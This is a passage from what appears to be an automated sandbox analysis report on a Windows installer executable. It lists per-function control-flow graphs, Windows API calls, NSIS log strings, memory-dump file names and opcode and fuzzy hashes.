                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                        • String ID: Exch: stack < %d elements$PaypalInteriorNvidiaNirvana$Pop: stack empty
                                                                                                                                                                                                                                                                                        • API String ID: 1459762280-2908248783
                                                                                                                                                                                                                                                                                        • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                        • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                                                                                                                        Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                        • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNELBASE(00761BA8), ref: 00402387
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                        • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                                        Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                        • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                                        Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                        • String ID: <RM>$PaypalInteriorNvidiaNirvana$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                                        • API String ID: 247603264-1058689761
                                                                                                                                                                                                                                                                                        • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                        • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                                                                                                                                        Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042795A,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                        • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                                        • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                        • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                                                                                                                                                        Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                        • String ID: nsa
                                                                                                                                                                                                                                                                                        • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                        • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                        • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                                                                        Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: HideWindow
                                                                                                                                                                                                                                                                                        • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                        • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                        • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                                        Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                        • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                                        Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                        • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                                        Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
